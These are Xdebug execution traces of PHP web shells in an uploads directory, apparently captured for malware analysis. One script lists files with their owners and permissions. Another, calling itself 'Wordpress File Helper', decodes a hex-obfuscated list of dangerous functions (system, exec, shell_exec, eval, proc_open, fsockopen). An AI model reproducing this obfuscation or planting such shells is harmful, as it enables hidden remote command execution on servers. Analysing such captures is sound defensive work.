2	2129	0	0.117041	727648	is_file	0		/var/www/html/uploads/1CTT.php	1094	1	'/var/www/html/uploads/data'
2	2129	1	0.117061	727688
2	2129	R			FALSE
2	2130	0	0.117075	727656	is_file	0		/var/www/html/uploads/1CTT.php	1094	1	'/var/www/html/uploads/prepend.php'
2	2130	1	0.117090	727704
2	2130	R			TRUE
2	2131	0	0.117104	727600	geticon	1		/var/www/html/uploads/1CTT.php	1097	1	'prepend.php'
3	2132	0	0.117117	727600	pathinfo	0		/var/www/html/uploads/1CTT.php	338	2	'prepend.php'	4
3	2132	1	0.117132	727696
3	2132	R			'php'
3	2133	0	0.117145	727632	strtolower	0		/var/www/html/uploads/1CTT.php	338	1	'php'
3	2133	1	0.117158	727664
3	2133	R			'php'
2		A						/var/www/html/uploads/1CTT.php	338	$ext = 'php'
2	2131	1	0.117182	727600
2	2131	R			'file-code'
2	2134	0	0.117196	727600	checkName	1		/var/www/html/uploads/1CTT.php	1097	1	'prepend.php'
3	2135	0	0.117209	727600	strlen	0		/var/www/html/uploads/1CTT.php	301	1	'prepend.php'
3	2135	1	0.117221	727632
3	2135	R			11
2	2134	1	0.117234	727600
2	2134	R			'prepend.php'
2	2136	0	0.117249	727600	function_exists	0		/var/www/html/uploads/1CTT.php	1098	1	'mime_content_type'
2	2136	1	0.117263	727640
2	2136	R			TRUE
2	2137	0	0.117275	727600	mime_content_type	0		/var/www/html/uploads/1CTT.php	1098	1	'prepend.php'
2	2137	1	0.117587	727672
2	2137	R			'text/x-php'
2	2138	0	0.117606	727640	checkName	1		/var/www/html/uploads/1CTT.php	1098	1	'text/x-php'
3	2139	0	0.117621	727640	strlen	0		/var/www/html/uploads/1CTT.php	301	1	'text/x-php'
3	2139	1	0.117635	727672
3	2139	R			10
2	2138	1	0.117648	727640
2	2138	R			'text/x-php'
2	2140	0	0.117663	727600	filesize	0		/var/www/html/uploads/1CTT.php	1099	1	'prepend.php'
2	2140	1	0.117679	727616
2	2140	R			57
2	2141	0	0.117692	727576	formatSize	1		/var/www/html/uploads/1CTT.php	1099	1	57
2		A						/var/www/html/uploads/1CTT.php	211	$types = [0 => 'B', 1 => 'KB', 2 => 'MB', 3 => 'GB', 4 => 'TB']
2		A						/var/www/html/uploads/1CTT.php	212	$i = 0
3	2142	0	0.117730	727576	round	0		/var/www/html/uploads/1CTT.php	213	2	57	2
3	2142	1	0.117743	727648
3	2142	R			57
2	2141	1	0.117758	727608
2	2141	R			'57 B'
2	2143	0	0.117772	727576	filemtime	0		/var/www/html/uploads/1CTT.php	1100	1	'prepend.php'
2	2143	1	0.117785	727616
2	2143	R			1676250662
2	2144	0	0.117799	727576	date	0		/var/www/html/uploads/1CTT.php	1100	2	'Y-m-d h:i:s'	1676250662
2	2144	1	0.117815	727904
2	2144	R			'2023-02-13 08:11:02'
2	2145	0	0.117829	727576	getowner	1		/var/www/html/uploads/1CTT.php	1101	1	'prepend.php'
3	2146	0	0.117842	727576	function_exists	0		/var/www/html/uploads/1CTT.php	321	1	'posix_getpwuid'
3	2146	1	0.117856	727616
3	2146	R			TRUE
3	2147	0	0.117869	727576	fileowner	0		/var/www/html/uploads/1CTT.php	322	1	'prepend.php'
3	2147	1	0.117882	727616
3	2147	R			0
3	2148	0	0.117895	727576	posix_getpwuid	0		/var/www/html/uploads/1CTT.php	322	1	0
3	2148	1	0.117919	728376
3	2148	R			['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
2		A						/var/www/html/uploads/1CTT.php	322	$downer = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
2		A						/var/www/html/uploads/1CTT.php	323	$downer = 'root'
3	2149	0	0.117973	727608	function_exists	0		/var/www/html/uploads/1CTT.php	327	1	'posix_getgrgid'
3	2149	1	0.117986	727648
3	2149	R			TRUE
3	2150	0	0.118000	727608	filegroup	0		/var/www/html/uploads/1CTT.php	328	1	'prepend.php'
3	2150	1	0.118013	727648
3	2150	R			0
3	2151	0	0.118026	727608	posix_getgrgid	0		/var/www/html/uploads/1CTT.php	328	1	0
3	2151	1	0.118048	728264
3	2151	R			['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
2		A						/var/www/html/uploads/1CTT.php	328	$dgrp = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
2		A						/var/www/html/uploads/1CTT.php	329	$dgrp = 'root'
2	2145	1	0.118094	727616
2	2145	R			'root/root'
2	2152	0	0.118109	727704	perms	1		/var/www/html/uploads/1CTT.php	1102	1	'/var/www/html/uploads/prepend.php'
3	2153	0	0.118123	727704	fileperms	0		/var/www/html/uploads/1CTT.php	218	1	'/var/www/html/uploads/prepend.php'
3	2153	1	0.118143	727768
3	2153	R			33261
2		A						/var/www/html/uploads/1CTT.php	218	$perms = 33261
2		A						/var/www/html/uploads/1CTT.php	224	$info = '-'
2		A						/var/www/html/uploads/1CTT.php	236	$info .= 'r'
2		A						/var/www/html/uploads/1CTT.php	237	$info .= 'w'
2		A						/var/www/html/uploads/1CTT.php	240	$info .= 'x'
2		A						/var/www/html/uploads/1CTT.php	241	$info .= 'r'
2		A						/var/www/html/uploads/1CTT.php	242	$info .= '-'
2		A						/var/www/html/uploads/1CTT.php	245	$info .= 'x'
2		A						/var/www/html/uploads/1CTT.php	246	$info .= 'r'
2		A						/var/www/html/uploads/1CTT.php	247	$info .= '-'
2		A						/var/www/html/uploads/1CTT.php	250	$info .= 'x'
3	2154	0	0.118264	727768	sprintf	0		/var/www/html/uploads/1CTT.php	251	2	'%o'	33261
3	2154	1	0.118278	728152
3	2154	R			'100755'
3	2155	0	0.118291	728088	substr	0		/var/www/html/uploads/1CTT.php	251	2	'100755'	-4
3	2155	1	0.118304	728184
3	2155	R			'0755'
2	2152	1	0.118318	727776
2	2152	R			'0755 >> -rwxr-xr-x'
2	2156	0	0.118332	727712	checkPerm	1		/var/www/html/uploads/1CTT.php	1102	2	'/var/www/html/uploads/prepend.php'	'0755 >> -rwxr-xr-x'
3	2157	0	0.118347	727712	explode	0		/var/www/html/uploads/1CTT.php	309	2	'>>'	'0755 >> -rwxr-xr-x'
3	2157	1	0.118362	728232
3	2157	R			[0 => '0755 ', 1 => ' -rwxr-xr-x']
2		A						/var/www/html/uploads/1CTT.php	309	$perm = [0 => '0755 ', 1 => ' -rwxr-xr-x']
3	2158	0	0.118391	728160	is_writable	0		/var/www/html/uploads/1CTT.php	310	1	'/var/www/html/uploads/prepend.php'
3	2158	1	0.118408	728200
3	2158	R			FALSE
3	2159	0	0.118422	728160	is_readable	0		/var/www/html/uploads/1CTT.php	312	1	'/var/www/html/uploads/prepend.php'
3	2159	1	0.118438	728200
3	2159	R			TRUE
3	2160	0	0.118451	728160	trim	0		/var/www/html/uploads/1CTT.php	315	1	'0755 '
3	2160	1	0.118463	728224
3	2160	R			'0755'
3	2161	0	0.118477	728480	trim	0		/var/www/html/uploads/1CTT.php	315	1	'0755 '
3	2161	1	0.118490	728544
3	2161	R			'0755'
2	2156	1	0.118504	728096
2	2156	R			'<font class=\'text-secondary\' data-bs-toggle=\'modal\' data-bs-target=\'#chmodModal\' data-bs-perm=\'0755\' data-bs-name=\'/var/www/html/uploads/prepend.php\'>0755 </font> >> <font class=\'text-secondary\' data-bs-toggle=\'modal\' data-bs-target=\'#chmodModal\' data-bs-perm=\'0755\' data-bs-name=\'/var/www/html/uploads/prepend.php\'> -rwxr-xr-x</font>'
1	3	1	0.118700	735792
			0.118750	511856
TRACE END   [2023-02-12 23:11:28.862578]

data/traces/fe48a2bd0d2c4060ff976ec41e0cdc3c_trace-1676251247.5569.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 23:21:13.454764]
1	0	1	0.000215	393512
1	3	0	0.001714	711472	{main}	1		/var/www/html/uploads/lCT.php	0	0
1		A						/var/www/html/uploads/lCT.php	3	$shellName = 'Wordpress File Helper'
1		A						/var/www/html/uploads/lCT.php	4	$logo = 'https://image.flaticon.com/icons/png/512/2959/2959607.png'
1		A						/var/www/html/uploads/lCT.php	5	$func = [0 => '7068705f756e616d65', 1 => '70687076657273696f6e', 2 => '676574637764', 3 => '6368646972', 4 => '707265675f73706c6974', 5 => '61727261795f64696666', 6 => '69735f646972', 7 => '69735f66696c65', 8 => '69735f7772697461626c65', 9 => '69735f7265616461626c65', 10 => '66696c6573697a65', 11 => '636f7079', 12 => '66696c655f657869737473', 13 => '66696c655f7075745f636f6e74656e7473', 14 => '66696c655f6765745f636f6e74656e7473', 15 => '6d6b646972', 16 => '72656e616d65', 17 => '737472746f74696d65', 18 => '68746d6c7370656369616c6368617273', 19 => '64617465', 20 => '66696c656d74696d65', 21 => '7363616e646972', 22 => '73797374656d', 23 => '65786563', 24 => '7061737374687275', 25 => '7368656c6c5f65786563', 26 => '6f625f6765745f636f6e74656e7473', 27 => '6f625f656e645f636c65616e', 28 => '6469726e616d65', 29 => '6469736b5f746f74616c5f7370616365', 30 => '6469736b5f667265655f7370616365', 31 => '696e695f676574', 32 => '707265675f6d617463685f616c6c', 33 => '706f7369785f6765747077756964', 34 => '706f7369785f6765746772676964', 35 => '70617468696e666f', 36 => '66696c656f776e6572', 37 => '66696c6567726f7570', 38 => '66696c6574797065', 39 => '676574686f73746e616d65', 40 => '676574686f737462796e616d65', 41 => '737562737472', 42 => '737472737472', 43 => '696e695f736574', 44 => '66696c65', 45 => '7374725f7265706c616365', 46 => '6578706c6f6465', 47 => '6576616c', 48 => '6f625f7374617274', 49 => '66756e6374696f6e5f657869737473', 50 => '6572726f725f7265706f7274696e67', 51 => '7365745f74696d655f6c696d6974', 52 => '636c656172737461746361636865', 53 => '646174655f64656661756c745f74696d657a6f6e655f736574', 54 => '666c757368', 55 => '7374726c656e', 56 => '7472696d', 57 => '656d707479', 58 => '6973736574', 59 => '66696c657065726d73', 60 => '7374726c656e', 61 => '636f756e74', 62 => '726f756e64', 63 => '6d696d655f636f6e74656e745f74797065', 64 => '6765745f63757272656e745f75736572', 65 => '6765746d79756964', 66 => '6765746d79676964', 67 => '706f7369785f67657465756964', 68 => '706f7369785f67657465676964', 69 => '616464736c6173686573', 70 => '73796d6c696e6b', 71 => '726d646972', 72 => '756e6c696e6b', 73 => '61727261795f6d6170', 74 => '676c6f62', 75 => '686561646572', 76 => '706f70656e', 77 => '69735f7265736f75726365', 78 => '66656f66', 79 => '6672656164', 80 => '70636c6f7365', 81 => '70726f635f6f70656e', 82 => '73747265616d5f6765745f636f6e74656e7473', 83 => '636c6173735f657869737473', 84 => '737072696e7466', 85 => '63686d6f64', 86 => '666f70656e', 87 => '667772697465', 88 => '6261736536345f6465636f6465', 89 => '66736f636b6f70656e', 90 => '6670757473', 91 => '6667657473', 92 => '66636c6f7365']
1		A						/var/www/html/uploads/lCT.php	6	$i = 0
2	4	0	0.001885	711472	dehex	1		/var/www/html/uploads/lCT.php	7	1	'7068705f756e616d65'
2		A						/var/www/html/uploads/lCT.php	201	$r = ''
2		A						/var/www/html/uploads/lCT.php	202	$len = 17
2		A						/var/www/html/uploads/lCT.php	203	$i = 0
3	5	0	0.001931	711504	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'70'
3	5	1	0.001944	711552
3	5	R			112
3	6	0	0.001958	711472	chr	0		/var/www/html/uploads/lCT.php	204	1	112
3	6	1	0.001969	711512
3	6	R			'p'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'p'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	7	0	0.002003	711536	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'68'
3	7	1	0.002015	711584
3	7	R			104
3	8	0	0.002028	711504	chr	0		/var/www/html/uploads/lCT.php	204	1	104
3	8	1	0.002039	711544
3	8	R			'h'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'h'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	9	0	0.002071	711536	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'70'
3	9	1	0.002082	711584
3	9	R			112
3	10	0	0.002095	711504	chr	0		/var/www/html/uploads/lCT.php	204	1	112
3	10	1	0.002106	711544
3	10	R			'p'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'p'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	11	0	0.002138	711536	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'5f'
3	11	1	0.002149	711584
3	11	R			95
3	12	0	0.002162	711504	chr	0		/var/www/html/uploads/lCT.php	204	1	95
3	12	1	0.002173	711544
3	12	R			'_'
2		A						/var/www/html/uploads/lCT.php	204	$r .= '_'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	13	0	0.002205	711536	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'75'
3	13	1	0.002216	711584
3	13	R			117
3	14	0	0.002229	711504	chr	0		/var/www/html/uploads/lCT.php	204	1	117
3	14	1	0.002239	711544
3	14	R			'u'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'u'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	15	0	0.002270	711536	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6e'
3	15	1	0.002282	711584
3	15	R			110
3	16	0	0.002294	711504	chr	0		/var/www/html/uploads/lCT.php	204	1	110
3	16	1	0.002305	711544
3	16	R			'n'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'n'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	17	0	0.002336	711536	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'61'
3	17	1	0.002347	711584
3	17	R			97
3	18	0	0.002359	711504	chr	0		/var/www/html/uploads/lCT.php	204	1	97
3	18	1	0.002370	711544
3	18	R			'a'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'a'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	19	0	0.002409	711536	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6d'
3	19	1	0.002427	711584
3	19	R			109
3	20	0	0.002441	711504	chr	0		/var/www/html/uploads/lCT.php	204	1	109
3	20	1	0.002453	711544
3	20	R			'm'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'm'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	21	0	0.002483	711544	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'65'
3	21	1	0.002494	711592
3	21	R			101
3	22	0	0.002507	711512	chr	0		/var/www/html/uploads/lCT.php	204	1	101
3	22	1	0.002518	711552
3	22	R			'e'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
2	4	1	0.002549	711512
2	4	R			'php_uname'
1		A						/var/www/html/uploads/lCT.php	7	$func[0] = 'php_uname'
1		A						/var/www/html/uploads/lCT.php	6	$i++
2	23	0	0.002585	719760	dehex	1		/var/www/html/uploads/lCT.php	7	1	'70687076657273696f6e'
2		A						/var/www/html/uploads/lCT.php	201	$r = ''
2		A						/var/www/html/uploads/lCT.php	202	$len = 19
2		A						/var/www/html/uploads/lCT.php	203	$i = 0
3	24	0	0.002627	719792	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'70'
3	24	1	0.002638	719840
3	24	R			112
3	25	0	0.002651	719760	chr	0		/var/www/html/uploads/lCT.php	204	1	112
3	25	1	0.002662	719800
3	25	R			'p'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'p'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	26	0	0.002693	719824	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'68'
3	26	1	0.002705	719872
3	26	R			104
3	27	0	0.002717	719792	chr	0		/var/www/html/uploads/lCT.php	204	1	104
3	27	1	0.002729	719832
3	27	R			'h'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'h'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	28	0	0.002759	719824	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'70'
3	28	1	0.002770	719872
3	28	R			112
3	29	0	0.002782	719792	chr	0		/var/www/html/uploads/lCT.php	204	1	112
3	29	1	0.002793	719832
3	29	R			'p'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'p'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	30	0	0.002823	719824	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'76'
3	30	1	0.002834	719872
3	30	R			118
3	31	0	0.002847	719792	chr	0		/var/www/html/uploads/lCT.php	204	1	118
3	31	1	0.002857	719832
3	31	R			'v'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'v'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	32	0	0.002887	719824	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'65'
3	32	1	0.002898	719872
3	32	R			101
3	33	0	0.002910	719792	chr	0		/var/www/html/uploads/lCT.php	204	1	101
3	33	1	0.002922	719832
3	33	R			'e'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	34	0	0.002951	719824	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'72'
3	34	1	0.002962	719872
3	34	R			114
3	35	0	0.002975	719792	chr	0		/var/www/html/uploads/lCT.php	204	1	114
3	35	1	0.002985	719832
3	35	R			'r'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'r'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	36	0	0.003015	719824	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'73'
3	36	1	0.003026	719872
3	36	R			115
3	37	0	0.003038	719792	chr	0		/var/www/html/uploads/lCT.php	204	1	115
3	37	1	0.003048	719832
3	37	R			's'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 's'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	38	0	0.003078	719824	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'69'
3	38	1	0.003089	719872
3	38	R			105
3	39	0	0.003101	719792	chr	0		/var/www/html/uploads/lCT.php	204	1	105
3	39	1	0.003113	719832
3	39	R			'i'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'i'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	40	0	0.003143	719832	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6f'
3	40	1	0.003158	719880
3	40	R			111
3	41	0	0.003171	719800	chr	0		/var/www/html/uploads/lCT.php	204	1	111
3	41	1	0.003183	719840
3	41	R			'o'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'o'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	42	0	0.003213	719832	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6e'
3	42	1	0.003224	719880
3	42	R			110
3	43	0	0.003236	719800	chr	0		/var/www/html/uploads/lCT.php	204	1	110
3	43	1	0.003248	719840
3	43	R			'n'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'n'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
2	23	1	0.003278	719800
2	23	R			'phpversion'
1		A						/var/www/html/uploads/lCT.php	7	$func[1] = 'phpversion'
1		A						/var/www/html/uploads/lCT.php	6	$i++
2	44	0	0.003313	719800	dehex	1		/var/www/html/uploads/lCT.php	7	1	'676574637764'
2		A						/var/www/html/uploads/lCT.php	201	$r = ''
2		A						/var/www/html/uploads/lCT.php	202	$len = 11
2		A						/var/www/html/uploads/lCT.php	203	$i = 0
3	45	0	0.003354	719832	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'67'
3	45	1	0.003365	719880
3	45	R			103
3	46	0	0.003377	719800	chr	0		/var/www/html/uploads/lCT.php	204	1	103
3	46	1	0.003389	719840
3	46	R			'g'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'g'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	47	0	0.003419	719864	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'65'
3	47	1	0.003430	719912
3	47	R			101
3	48	0	0.003443	719832	chr	0		/var/www/html/uploads/lCT.php	204	1	101
3	48	1	0.003453	719872
3	48	R			'e'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	49	0	0.003483	719864	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'74'
3	49	1	0.003494	719912
3	49	R			116
3	50	0	0.003506	719832	chr	0		/var/www/html/uploads/lCT.php	204	1	116
3	50	1	0.003518	719872
3	50	R			't'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 't'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	51	0	0.003548	719864	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'63'
3	51	1	0.003559	719912
3	51	R			99
3	52	0	0.003571	719832	chr	0		/var/www/html/uploads/lCT.php	204	1	99
3	52	1	0.003581	719872
3	52	R			'c'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'c'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	53	0	0.003612	719864	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'77'
3	53	1	0.003623	719912
3	53	R			119
3	54	0	0.003635	719832	chr	0		/var/www/html/uploads/lCT.php	204	1	119
3	54	1	0.003646	719872
3	54	R			'w'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'w'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	55	0	0.003676	719864	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'64'
3	55	1	0.003687	719912
3	55	R			100
3	56	0	0.003699	719832	chr	0		/var/www/html/uploads/lCT.php	204	1	100
3	56	1	0.003710	719872
3	56	R			'd'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'd'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
2	44	1	0.003740	719832
2	44	R			'getcwd'
1		A						/var/www/html/uploads/lCT.php	7	$func[2] = 'getcwd'
1		A						/var/www/html/uploads/lCT.php	6	$i++
2	57	0	0.003774	719832	dehex	1		/var/www/html/uploads/lCT.php	7	1	'6368646972'
2		A						/var/www/html/uploads/lCT.php	201	$r = ''
2		A						/var/www/html/uploads/lCT.php	202	$len = 9
2		A						/var/www/html/uploads/lCT.php	203	$i = 0
3	58	0	0.003814	719864	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'63'
3	58	1	0.003825	719912
3	58	R			99
3	59	0	0.003837	719832	chr	0		/var/www/html/uploads/lCT.php	204	1	99
3	59	1	0.003848	719872
3	59	R			'c'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'c'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	60	0	0.003878	719896	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'68'
3	60	1	0.003892	719944
3	60	R			104
3	61	0	0.003905	719864	chr	0		/var/www/html/uploads/lCT.php	204	1	104
3	61	1	0.003916	719904
3	61	R			'h'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'h'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	62	0	0.003946	719896	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'64'
3	62	1	0.003957	719944
3	62	R			100
3	63	0	0.003969	719864	chr	0		/var/www/html/uploads/lCT.php	204	1	100
3	63	1	0.003980	719904
3	63	R			'd'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'd'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	64	0	0.004010	719896	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'69'
3	64	1	0.004021	719944
3	64	R			105
3	65	0	0.004033	719864	chr	0		/var/www/html/uploads/lCT.php	204	1	105
3	65	1	0.004044	719904
3	65	R			'i'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'i'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	66	0	0.004074	719896	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'72'
3	66	1	0.004085	719944
3	66	R			114
3	67	0	0.004097	719864	chr	0		/var/www/html/uploads/lCT.php	204	1	114
3	67	1	0.004108	719904
3	67	R			'r'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'r'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
2	57	1	0.004138	719864
2	57	R			'chdir'
1		A						/var/www/html/uploads/lCT.php	7	$func[3] = 'chdir'
1		A						/var/www/html/uploads/lCT.php	6	$i++
2	68	0	0.004171	719864	dehex	1		/var/www/html/uploads/lCT.php	7	1	'707265675f73706c6974'
2		A						/var/www/html/uploads/lCT.php	201	$r = ''
2		A						/var/www/html/uploads/lCT.php	202	$len = 19
2		A						/var/www/html/uploads/lCT.php	203	$i = 0
3	69	0	0.004212	719896	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'70'
3	69	1	0.004223	719944
3	69	R			112
3	70	0	0.004235	719864	chr	0		/var/www/html/uploads/lCT.php	204	1	112
3	70	1	0.004246	719904
3	70	R			'p'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'p'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	71	0	0.004277	719928	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'72'
3	71	1	0.004288	719976
3	71	R			114
3	72	0	0.004301	719896	chr	0		/var/www/html/uploads/lCT.php	204	1	114
3	72	1	0.004312	719936
3	72	R			'r'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'r'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	73	0	0.004342	719928	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'65'
3	73	1	0.004352	719976
3	73	R			101
3	74	0	0.004365	719896	chr	0		/var/www/html/uploads/lCT.php	204	1	101
3	74	1	0.004375	719936
3	74	R			'e'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	75	0	0.004405	719928	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'67'
3	75	1	0.004417	719976
3	75	R			103
3	76	0	0.004429	719896	chr	0		/var/www/html/uploads/lCT.php	204	1	103
3	76	1	0.004440	719936
3	76	R			'g'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'g'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	77	0	0.004469	719928	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'5f'
3	77	1	0.004480	719976
3	77	R			95
3	78	0	0.004492	719896	chr	0		/var/www/html/uploads/lCT.php	204	1	95
3	78	1	0.004503	719936
3	78	R			'_'
2		A						/var/www/html/uploads/lCT.php	204	$r .= '_'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	79	0	0.004533	719928	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'73'
3	79	1	0.004544	719976
3	79	R			115
3	80	0	0.004557	719896	chr	0		/var/www/html/uploads/lCT.php	204	1	115
3	80	1	0.004568	719936
3	80	R			's'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 's'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	81	0	0.004598	719928	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'70'
3	81	1	0.004608	719976
3	81	R			112
3	82	0	0.004621	719896	chr	0		/var/www/html/uploads/lCT.php	204	1	112
3	82	1	0.004636	719936
3	82	R			'p'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'p'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	83	0	0.004666	719928	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6c'
3	83	1	0.004677	719976
3	83	R			108
3	84	0	0.004689	719896	chr	0		/var/www/html/uploads/lCT.php	204	1	108
3	84	1	0.004700	719936
3	84	R			'l'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'l'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	85	0	0.004730	719936	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'69'
3	85	1	0.004741	719984
3	85	R			105
3	86	0	0.004753	719904	chr	0		/var/www/html/uploads/lCT.php	204	1	105
3	86	1	0.004764	719944
3	86	R			'i'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'i'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	87	0	0.004793	719936	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'74'
3	87	1	0.004804	719984
3	87	R			116
3	88	0	0.004817	719904	chr	0		/var/www/html/uploads/lCT.php	204	1	116
3	88	1	0.004827	719944
3	88	R			't'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 't'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
2	68	1	0.004857	719904
2	68	R			'preg_split'
1		A						/var/www/html/uploads/lCT.php	7	$func[4] = 'preg_split'
1		A						/var/www/html/uploads/lCT.php	6	$i++
2	89	0	0.004892	719904	dehex	1		/var/www/html/uploads/lCT.php	7	1	'61727261795f64696666'
2		A						/var/www/html/uploads/lCT.php	201	$r = ''
2		A						/var/www/html/uploads/lCT.php	202	$len = 19
2		A						/var/www/html/uploads/lCT.php	203	$i = 0
3	90	0	0.004933	719936	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'61'
3	90	1	0.004944	719984
3	90	R			97
3	91	0	0.004957	719904	chr	0		/var/www/html/uploads/lCT.php	204	1	97
3	91	1	0.004968	719944
3	91	R			'a'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'a'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	92	0	0.004998	719968	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'72'
3	92	1	0.005009	720016
3	92	R			114
3	93	0	0.005022	719936	chr	0		/var/www/html/uploads/lCT.php	204	1	114
3	93	1	0.005033	719976
3	93	R			'r'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'r'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
